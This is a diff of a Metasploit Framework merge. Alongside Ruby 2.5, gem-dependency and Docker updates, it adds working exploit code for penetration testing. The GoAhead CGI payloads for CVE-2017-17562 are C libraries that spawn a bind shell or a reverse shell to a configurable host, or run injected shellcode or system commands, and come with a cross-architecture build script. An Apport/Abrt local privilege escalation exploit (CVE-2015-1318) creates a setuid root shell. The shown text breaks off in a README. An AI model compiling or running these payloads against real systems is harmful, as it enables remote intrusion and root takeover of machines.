Land #9786, disable aggregator for the Ruby 2.5 transition

Land #9684

.dockerignore

@@ -4,6 +4,7 @@
 docker-compose*.yml
 docker/
 !docker/msfconsole.rc
+!docker/entrypoint.sh
 README.md
 .git/
 .github/

.rubocop.yml

@@ -92,9 +92,10 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/SpaceInsideBrackets:
-  Enabled: false
-  Description: 'Until module template are final, most modules will fail this.'
+Layout/AlignParameters:
+  Enabled: true
+  EnforcedStyle: 'with_fixed_indentation'
+  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
 
 Style/StringLiterals:
   Enabled: false

.ruby-version

@@ -1 +1 @@
-2.4.2
+2.5.1

.travis.yml

@@ -11,9 +11,9 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.2'
-  - '2.3.5'
-  - '2.4.2'
+  - '2.3.7'
+  - '2.4.4'
+  - '2.5.1'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'

Dockerfile

@@ -1,9 +1,8 @@
-FROM ruby:2.4.2-alpine
+FROM ruby:2.5.1-alpine3.7
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
 ENV APP_HOME /usr/src/metasploit-framework/
-ENV MSF_USER msf
 ENV NMAP_PRIVILEGED=""
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
@@ -15,19 +14,23 @@ COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
 
 RUN apk update && \
     apk add \
+      bash \
       sqlite-libs \
       nmap \
       nmap-scripts \
       nmap-nselibs \
       postgresql-libs \
+      python \
+      python3 \
       ncurses \
       libcap \
+      su-exec \
     && apk add --virtual .ruby-builddeps \
       autoconf \
       bison \
       build-base \
       ruby-dev \
-      openssl-dev \
+      libressl-dev \
       readline-dev \
       sqlite-dev \
       postgresql-dev \
@@ -45,13 +48,16 @@ RUN apk update && \
     && apk del .ruby-builddeps \
     && rm -rf /var/cache/apk/*
 
-RUN adduser -g msfconsole -D $MSF_USER
-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
-USER $MSF_USER
-
 ADD ./ $APP_HOME
 
+# we need this entrypoint to dynamically create a user
+# matching the hosts UID and GID so we can mount something
+# from the users home directory. If the IDs don't match
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
+ENTRYPOINT ["docker/entrypoint.sh"]
+
 CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

Gemfile

@@ -19,10 +19,8 @@ group :development do
   # module documentation
   gem 'octokit'
   # Metasploit::Aggregator external session proxy
-  gem 'metasploit-aggregator' if [
-    'x86-mingw32', 'x64-mingw32',
-    'x86_64-linux', 'x86-linux',
-    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  # disabled during 2.5 transition until aggregator is available
+  #gem 'metasploit-aggregator'
 end
 
 group :development, :test do

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.32)
+    metasploit-framework (4.16.48)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -16,11 +16,11 @@ PATH
       json
       metasm
       metasploit-concern
-      metasploit-credential
+      metasploit-credential (< 3.0.0)
       metasploit-model
-      metasploit-payloads (= 1.3.25)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.3.3)
+      metasploit-payloads (= 1.3.32)
+      metasploit_data_models (< 3.0.0)
+      metasploit_payloads-mettle (= 0.3.7)
       mqtt
       msgpack
       nessus_rest
@@ -38,7 +38,6 @@ PATH
       pg (= 0.20.0)
       railties
       rb-readline
-      rbnacl (< 5.0.0)
       recog
       redcarpet
       rex-arch
@@ -59,7 +58,8 @@ PATH
       rex-struct2
       rex-text
       rex-zip
-      ruby_smb
+      ruby-macho
+      ruby_smb (= 0.0.18)
       rubyntlm
       rubyzip
       sqlite3
@@ -73,7 +73,7 @@ PATH
 GEM
   remote: https://rubygems.org/
   specs:
-    Ascii85 (1.0.2)
+    Ascii85 (1.0.3)
     actionpack (4.2.10)
       actionview (= 4.2.10)
       activesupport (= 4.2.10)
@@ -103,12 +103,12 @@ GEM
       public_suffix (>= 2.0.2, < 4.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.5.0)
+    arel-helpers (2.6.1)
       activerecord (>= 3.1.0, < 6)
-    backports (3.11.0)
+    backports (3.11.1)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.1)
+    bindata (2.4.3)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
@@ -116,7 +116,7 @@ GEM
     crass (1.0.3)
     diff-lcs (1.3)
     dnsruby (1.60.2)
-    docile (1.1.5)
+    docile (1.3.0)
     erubis (2.7.0)
     factory_girl (4.9.0)
       activesupport (>= 3.0.0)
@@ -125,53 +125,28 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.13.1)
+    faraday (0.14.0)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
     filesize (0.1.1)
-    fivemat (1.3.5)
-    google-protobuf (3.5.1)
-    googleapis-common-protos-types (1.0.1)
-      google-protobuf (~> 3.0)
-    googleauth (0.6.2)
-      faraday (~> 0.12)
-      jwt (>= 1.4, < 3.0)
-      logging (~> 2.0)
-      memoist (~> 0.12)
-      multi_json (~> 1.11)
-      os (~> 0.9)
-      signet (~> 0.7)
-    grpc (1.8.3)
-      google-protobuf (~> 3.1)
-      googleapis-common-protos-types (~> 1.0.0)
-      googleauth (>= 0.5.1, < 0.7)
+    fivemat (1.3.6)
     hashery (2.1.2)
-    i18n (0.9.1)
+    i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.1.0)
-    jwt (2.1.0)
-    little-plugger (1.1.4)
-    logging (2.2.2)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.10)
-    loofah (2.1.1)
+    loofah (2.2.2)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
-    memoist (0.16.0)
     metasm (1.0.3)
-    metasploit-aggregator (1.0.0)
-      grpc
-      rex-arch
     metasploit-concern (2.0.5)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.12)
+    metasploit-credential (2.0.14)
       metasploit-concern
       metasploit-model
-      metasploit_data_models
+      metasploit_data_models (< 3.0.0)
       pg
       railties
       rex-socket
@@ -181,41 +156,39 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.25)
-    metasploit_data_models (2.0.15)
+    metasploit-payloads (1.3.32)
+    metasploit_data_models (2.0.16)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
       metasploit-concern
       metasploit-model
-      pg
+      pg (= 0.20.0)
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.3.3)
+    metasploit_payloads-mettle (0.3.7)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.11.1)
+    minitest (5.11.3)
     mqtt (0.5.0)
-    msgpack (1.2.2)
-    multi_json (1.13.1)
+    msgpack (1.2.4)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.2.0)
     network_interface (0.0.2)
-    nexpose (7.1.1)
-    nokogiri (1.8.1)
+    nexpose (7.2.0)
+    nokogiri (1.8.2)
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
-    os (0.9.6)
     packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.12.4)
-    pdf-reader (2.0.0)
+    pdf-reader (2.1.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -230,8 +203,8 @@ GEM
     pry (0.11.3)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.0.1)
-    rack (1.6.8)
+    public_suffix (3.0.2)
+    rack (1.6.9)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
@@ -240,18 +213,16 @@ GEM
       activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.3)
-      loofah (~> 2.0)
+    rails-html-sanitizer (1.0.4)
+      loofah (~> 2.2, >= 2.2.2)
     railties (4.2.10)
       actionpack (= 4.2.10)
       activesupport (= 4.2.10)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.3.0)
+    rake (12.3.1)
     rb-readline (0.5.5)
-    rbnacl (4.0.2)
-      ffi
-    recog (2.1.17)
+    recog (2.1.18)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.13)
@@ -262,12 +233,12 @@ GEM
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.12)
+    rex-core (0.1.13)
     rex-encoder (0.1.4)
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.16)
+    rex-exploitation (0.1.17)
       jsobfu
       metasm
       rex-arch
@@ -290,7 +261,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.10)
+    rex-socket (0.1.13)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
@@ -323,7 +294,8 @@ GEM
       rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.7.1)
+    ruby-macho (1.1.0)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
       bindata
@@ -334,13 +306,8 @@ GEM
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
-    signet (0.8.1)
-      addressable (~> 2.3)
-      faraday (~> 0.9)
-      jwt (>= 1.5, < 3.0)
-      multi_json (~> 1.10)
-    simplecov (0.15.1)
-      docile (~> 1.1.0)
+    simplecov (0.16.1)
+      docile (~> 1.1)
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.2)
@@ -350,9 +317,9 @@ GEM
     thread_safe (0.3.6)
     timecop (0.9.1)
     ttfunk (1.5.1)
-    tzinfo (1.2.4)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2017.3)
+    tzinfo-data (1.2018.4)
       tzinfo (>= 1.0.0)
     windows_error (0.1.2)
     xdr (2.0.0)
@@ -367,7 +334,6 @@ PLATFORMS
 DEPENDENCIES
   factory_girl_rails
   fivemat
-  metasploit-aggregator
   metasploit-framework!
   octokit
   pry

LICENSE

@@ -75,6 +75,10 @@ Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
 
+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0
+
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

data/exploits/CVE-2017-17562/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-17562/goahead-cgi-bind.c

@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-reverse.c

@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-system.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    int dummy = 0;
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      dummy = system((const char*)payload);
+
+    exit(dummy);
+}

data/exploits/CVE-2017-17562/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi

data/exploits/cve-2015-1318/newpid.c

@@ -0,0 +1,143 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <err.h>
+#include <syslog.h>
+#include <sched.h>
+#include <linux/sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+ 
+//
+// Apport/Abrt Vulnerability Demo Exploit.
+//
+//  Apport: CVE-2015-1318
+//  Abrt:   CVE-2015-1862
+// 
+//   -- taviso@cmpxchg8b.com, April 2015.
+//
+// $ gcc -static newpid.c
+// $ ./a.out
+// uid=0(root) gid=0(root) groups=0(root)
+// sh-4.3# exit
+// exit
+//
+// Hint: To get libc.a,
+//  yum install glibc-static or apt-get install libc6-dev
+//
+
+//
+// Modified for Metasploit. Original exploit:
+// - https://www.exploit-db.com/exploits/36746/
+//
+ 
+int main(int argc, char **argv)
+{
+    int status;
+    pid_t wrapper;
+    pid_t init;
+    pid_t subprocess;
+    unsigned i;
+
+    // If we're root, then we've convinced the core handler to run us,
+    // so create a setuid root executable that can be used outside the chroot.
+    if (getuid() == 0) {
+        if (chown("sh", 0, 0) != 0)
+            exit(EXIT_FAILURE);
+ 
+        if (chmod("sh", 04755) != 0)
+            exit(EXIT_FAILURE);
+ 
+        return EXIT_SUCCESS;
+    }
+ 
+    // If I'm not root, but euid is 0, then the exploit worked and we can spawn
+    // a shell and cleanup.
+    if (setuid(0) == 0) {
+        system("id");
+        system("rm -rf exploit");
+        execlp("sh", "sh", NULL);
+ 
+        // Something went wrong.
+        err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
+    }
+ 
+    // It looks like the exploit hasn't run yet, so create a chroot.
+    if (mkdir("exploit", 0755) != 0
+     || mkdir("exploit/usr", 0755) != 0
+     || mkdir("exploit/usr/share", 0755) != 0
+     || mkdir("exploit/usr/share/apport", 0755) != 0
+     || mkdir("exploit/usr/libexec", 0755) != 0) {
+        err(EXIT_FAILURE, "failed to create chroot directory");
+    }
+ 
+    // Create links to the exploit locations we need.
+    if (link(*argv, "exploit/sh") != 0
+     || link(*argv, "exploit/usr/share/apport/apport") != 0        // Ubuntu
+     || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) {  // Fedora
+        err(EXIT_FAILURE, "failed to create required hard links");
+    }
+ 
+    // Create a subprocess so we don't enter the new namespace.
+    if ((wrapper = fork()) == 0) {
+ 
+        // In the child process, create a new pid and user ns. The pid
+        // namespace is only needed on Ubuntu, because they check for %P != %p
+        // in their core handler. On Fedora, just a user ns is sufficient.
+        if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
+            err(EXIT_FAILURE, "failed to create new namespace");
+ 
+        // Create a process in the new namespace.
+        if ((init = fork()) == 0) {
+ 
+            // Init (pid 1) signal handling is special, so make a subprocess to
+            // handle the traps.
+            if ((subprocess = fork()) == 0) {
+                // Change /proc/self/root, which we can do as we're privileged
+                // within the new namepace.
+                if (chroot("exploit") != 0) {
+                    err(EXIT_FAILURE, "chroot didnt work");
+                }
+ 
+                // Now trap to get the core handler invoked.
+                __builtin_trap();
+ 
+                // Shouldn't happen, unless user is ptracing us or something.
+                err(EXIT_FAILURE, "coredump failed, were you ptracing?");
+            }
+ 
+            // If the subprocess exited with an abnormal signal, then everything worked.
+            if (waitpid(subprocess, &status, 0) == subprocess)    
+                return WIFSIGNALED(status)
+                        ? EXIT_SUCCESS
+                        : EXIT_FAILURE;
+ 
+            // Something didn't work.
+            return EXIT_FAILURE;
+        }
+ 
+        // The new namespace didn't work.
+        if (waitpid(init, &status, 0) == init)
+            return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
+                    ? EXIT_SUCCESS
+                    : EXIT_FAILURE;
+ 
+        // Waitpid failure.
+        return EXIT_FAILURE;
+    }
+ 
+    // If the subprocess returned sccess, the exploit probably worked,
+    // reload with euid zero.
+    if (waitpid(wrapper, &status, 0) == wrapper) {
+        // All done, spawn root shell.
+        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+            execl(*argv, "w00t", NULL);
+        }
+    }
+ 
+    // Unknown error.
+    errx(EXIT_FAILURE, "unexpected result, cannot continue");
+}

data/logos/metasploit-heart-red-bold.txt

@@ -0,0 +1,21 @@
+%clr%red
+      .:okOOOkdc'           'cdkOOOko:.
+    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
+   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
+  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+  oOOOOOOOO.%clr%bldMMMM%clr%red.oOOOOoOOOOl.%clr%bldMMMM%clr%red,OOOOOOOOo
+  dOOOOOOOO.%clr%bldMMMMMM%clr%red.cOOOOOc.%clr%bldMMMMMM%clr%red,OOOOOOOOx
+  lOOOOOOOO.%clr%bldMMMMMMMMM%clr%red;d;%clr%bldMMMMMMMMM%clr%red,OOOOOOOOl
+  .OOOOOOOO.%clr%bldMMM%clr%red.;%clr%bldMMMMMMMMMMM%clr%red;%clr%bldMMMM%clr%red,OOOOOOOO.
+   cOOOOOOO.%clr%bldMMM%clr%red.OOc.%clr%bldMMMMM%clr%red'oOO.%clr%bldMMM%clr%red,OOOOOOOc
+    oOOOOOO.%clr%bldMMM%clr%red.OOOO.%clr%bldMMM%clr%red:OOOO.%clr%bldMMM%clr%red,OOOOOOo
+     lOOOOO.%clr%bldMMM%clr%red.OOOO.%clr%bldMMM%clr%red:OOOO.%clr%bldMMM%clr%red,OOOOOl
+      ;OOOO'%clr%bldMMM%clr%red.OOOO.%clr%bldMMM%clr%red:OOOO.%clr%bldMMM%clr%red;OOOO;
+       .dOOo'%clr%bldWM%clr%red.OOOOocccxOOOO.%clr%bldMX%clr%red'xOOd.
+         ,kOl'%clr%bldM%clr%red.OOOOOOOOOOOOO.%clr%bldM%clr%red'dOk,
+           :kk;.OOOOOOOOOOOOO.;Ok:
+             ;kOOOOOOOOOOOOOOOk:
+               ,xOOOOOOOOOOOx,
+                 .lOOOOOOOl.
+                    ,dOd,
+                      .%clr

data/logos/metasploit-heart-red.txt

@@ -0,0 +1,21 @@
+%clr%red
+      .:okOOOkdc'           'cdkOOOko:.
+    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
+   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
+  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
+  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
+  lOOOOOOOO.         ;d;         ,OOOOOOOOl
+  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
+   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
+    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
+     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
+      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
+       .dOOo   .OOOOocccxOOOO.   xOOd.
+         ,kOl  .OOOOOOOOOOOOO. .dOk,
+           :kk;.OOOOOOOOOOOOO.cOk:
+             ;kOOOOOOOOOOOOOOOk:
+               ,xOOOOOOOOOOOx,
+                 .lOOOOOOOl.
+                    ,dOd,
+                      .%clr

data/markdown_doc/default_template.erb

@@ -1,11 +1,9 @@
 ## <%= items[:mod_name] %>
-<p>
 <%= normalize_description(items[:mod_description]) %>
-</p>
 
 ## Module Name
 
-<%= Rex::Text.html_encode(items[:mod_fullname]) %>
+<%= CGI::escapeHTML(items[:mod_fullname]) %>
 
 ## Authors
 
@@ -47,4 +45,4 @@ No options required.
 
 ## Basic Usage
 
-<%= normalize_demo_output(items[:mod_demo]) %>
+<%= normalize_demo_output(items[:mod_demo]) %>

data/markdown_doc/html_template.erb

@@ -65,4 +65,4 @@
 </div>
 <% end %>
 </body>
-</html>
+</html>

data/wordlists/named_pipes.txt

@@ -0,0 +1,25 @@
+netlogon
+lsarpc
+samr
+browser
+atsvc
+DAV RPC SERVICE
+epmapper
+eventlog
+InitShutdown
+keysvc
+lsass
+LSM_API_service
+ntsvcs
+plugplay
+protected_storage
+router
+SapiServerPipeS-1-5-5-0-70123
+scerpc
+srvsvc
+tapsrv
+trkwks
+W32TIME_ALT
+wkssvc
+PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
+db2remotecmd

docker/README.md

@@ -3,24 +3,27 @@
 
 To run `msfconsole`
 ```bash
-docker-compose build
-docker-compose run --rm --service-ports ms
